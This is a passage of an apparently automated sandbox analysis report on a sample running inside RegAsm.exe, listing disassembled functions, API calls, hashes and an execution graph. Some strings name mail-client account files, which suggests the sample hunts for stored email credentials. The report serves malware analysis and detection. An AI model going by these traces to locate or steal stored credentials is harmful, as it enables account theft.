                                                                                                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                • API String ID: 4036392271-1520055953
                                                                                                                                                                                • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                                                                • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                                                                Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                                                                • _free.LIBCMT ref: 100071B8
                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 336800556-0
                                                                                                                                                                                • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                                                                • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                                                                Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                                                • _free.LIBCMT ref: 10005BB4
                                                                                                                                                                                • _free.LIBCMT ref: 10005BDB
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                                                                • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                                                                Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen$lstrcat
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 493641738-0
                                                                                                                                                                                • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                                                                • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                                                                Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 100091D0
                                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                • _free.LIBCMT ref: 100091E2
                                                                                                                                                                                • _free.LIBCMT ref: 100091F4
                                                                                                                                                                                • _free.LIBCMT ref: 10009206
                                                                                                                                                                                • _free.LIBCMT ref: 10009218
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                                                                • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                                                                Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 1000536F
                                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                • _free.LIBCMT ref: 10005381
                                                                                                                                                                                • _free.LIBCMT ref: 10005394
                                                                                                                                                                                • _free.LIBCMT ref: 100053A5
                                                                                                                                                                                • _free.LIBCMT ref: 100053B6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                                • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                                                                • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                                • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                                                                Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                                                                                                                                • _free.LIBCMT ref: 10004CE8
                                                                                                                                                                                • _free.LIBCMT ref: 10004CF2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                • API String ID: 2506810119-1068371695
                                                                                                                                                                                • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                                                                • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                                                                Function 10004B39 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeHandleLibraryModule
                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                • API String ID: 662261464-1276376045
                                                                                                                                                                                • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                                                                • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                                                                Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                                                                • __freea.LIBCMT ref: 100087D5
                                                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2652629310-0
                                                                                                                                                                                • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                                                                • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                                                • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                                                                Function 10001CCA Relevance: 6.1, APIs: 4, Instructions: 84fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$CloseHandleReadSize
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3642004256-0
                                                                                                                                                                                • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                                                                • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                                                                Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 1000655C
                                                                                                                                                                                  • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                                                                                                                                  • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                                                                                  • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                • String ID: *?$.
                                                                                                                                                                                • API String ID: 2667617558-3972193922
                                                                                                                                                                                • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                                                                                • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                                                                                Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strlen
                                                                                                                                                                                • String ID: : $Se.
                                                                                                                                                                                • API String ID: 4218353326-4089948878
                                                                                                                                                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                                                                Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                                                                  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                • String ID: Unknown exception
                                                                                                                                                                                • API String ID: 3476068407-410509341
                                                                                                                                                                                • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                                                                • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:5.4%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                Signature Coverage:1.8%
                                                                                                                                                                                Total number of Nodes:1990
                                                                                                                                                                                Total number of Limit Nodes:56
                                                                                                                                                                                execution_graph 37712 4466f4 37731 446904 37712->37731 37714 446700 GetModuleHandleA 37717 446710 __set_app_type __p__fmode __p__commode 37714->37717 37716 4467a4 37718 4467ac __setusermatherr 37716->37718 37719 4467b8 37716->37719 37717->37716 37718->37719 37732 4468f0 _controlfp 37719->37732 37721 4467bd _initterm GetEnvironmentStringsW _initterm 37722 44681e GetStartupInfoW 37721->37722 37723 446810 37721->37723 37725 446866 GetModuleHandleA 37722->37725 37733 41276d 37725->37733 37729 446896 exit 37730 44689d _cexit 37729->37730 37730->37723 37731->37714 37732->37721 37734 41277d 37733->37734 37776 4044a4 LoadLibraryW 37734->37776 37736 412785 37737 412789 37736->37737 37782 414b81 37736->37782 37737->37729 37737->37730 37740 4127c8 37786 412465 memset ??2@YAPAXI 37740->37786 37742 4127ea 37798 40ac21 37742->37798 37747 412813 37816 40dd07 memset 37747->37816 37748 412827 37821 40db69 memset 37748->37821 37751 412822 37843 4125b6 ??3@YAXPAX DeleteObject 37751->37843 37753 40ada2 _wcsicmp 37754 41283d 37753->37754 37754->37751 37757 412863 CoInitialize 37754->37757 37826 41268e 37754->37826 37756 412966 37844 40b1ab free free 37756->37844 37842 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37757->37842 37761 41296f 37845 40b633 37761->37845 37763 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37768 412957 CoUninitialize 37763->37768 37773 4128ca 37763->37773 37768->37751 37769 4128d0 TranslateAcceleratorW 37770 412941 GetMessageW 37769->37770 37769->37773 37770->37768 37770->37769 37771 412909 IsDialogMessageW 37771->37770 37771->37773 37772 4128fd IsDialogMessageW 37772->37770 37772->37771 37773->37769 37773->37771 37773->37772 37774 41292b TranslateMessage DispatchMessageW 37773->37774 37775 41291f IsDialogMessageW 37773->37775 37774->37770 37775->37770 37775->37774 37777 4044f3 37776->37777 37781 4044cf FreeLibrary 37776->37781 37779 404507 MessageBoxW 37777->37779 37780 40451e 37777->37780 37779->37736 37780->37736 37781->37777 37783 414b8a 37782->37783 37784 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37782->37784 37849 40a804 memset 37783->37849 37784->37740 37787 4124e0 37786->37787 37788 412505 ??2@YAPAXI 37787->37788 37789 41251c 37788->37789 37794 412521 37788->37794 37871 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37789->37871 37860 444722 37794->37860 37797 41259b wcscpy 37797->37742 37876 40b1ab free free 37798->37876 37802 40a9ce malloc memcpy free free 37804 40ac5c 37802->37804 37803 40ad4b 37811 40ad76 37803->37811 37900 40a9ce 37803->37900 37804->37802 37804->37803 37806 40ace7 free 37804->37806 37804->37811 37880 40a8d0 37804->37880 37892 4099f4 37804->37892 37806->37804 37810 40a8d0 7 API calls 37810->37811 37877 40aa04 37811->37877 37812 40ada2 37814 40adc9 37812->37814 37815 40adaa 37812->37815 37813 40adb3 _wcsicmp 37813->37814 37813->37815 37814->37747 37814->37748 37815->37813 37815->37814 37905 40dce0 37816->37905 37818 40dd3a GetModuleHandleW 37910 40dba7 37818->37910 37822 40dce0 3 API calls 37821->37822 37823 40db99 37822->37823 37982 40dae1 37823->37982 37996 402f3a 37826->37996 37828 412766 37828->37751 37828->37757 37829 4126d3 _wcsicmp 37830 4126a8 37829->37830 37830->37828 37830->37829 37832 41270a 37830->37832 38030 4125f8 7 API calls 37830->38030 37832->37828 37999 411ac5 37832->37999 37842->37763 37843->37756 37844->37761 37846 40b640 37845->37846 37847 40b639 free 37845->37847 37848 40b1ab free free 37846->37848 37847->37846 37848->37737 37850 40a83b GetSystemDirectoryW 37849->37850 37851 40a84c wcscpy 37849->37851 37850->37851 37856 409719 wcslen 37851->37856 37854 40a881 LoadLibraryW 37855 40a886 37854->37855 37855->37784 37857 409724 37856->37857 37858 409739 wcscat LoadLibraryW 37856->37858 37857->37858 37859 40972c wcscat 37857->37859 37858->37854 37858->37855 37859->37858 37861 444732 37860->37861 37862 444728 DeleteObject 37860->37862 37872 409cc3 37861->37872 37862->37861 37864 412551 37865 4010f9 37864->37865 37866 401130 37865->37866 37867 401134 GetModuleHandleW LoadIconW 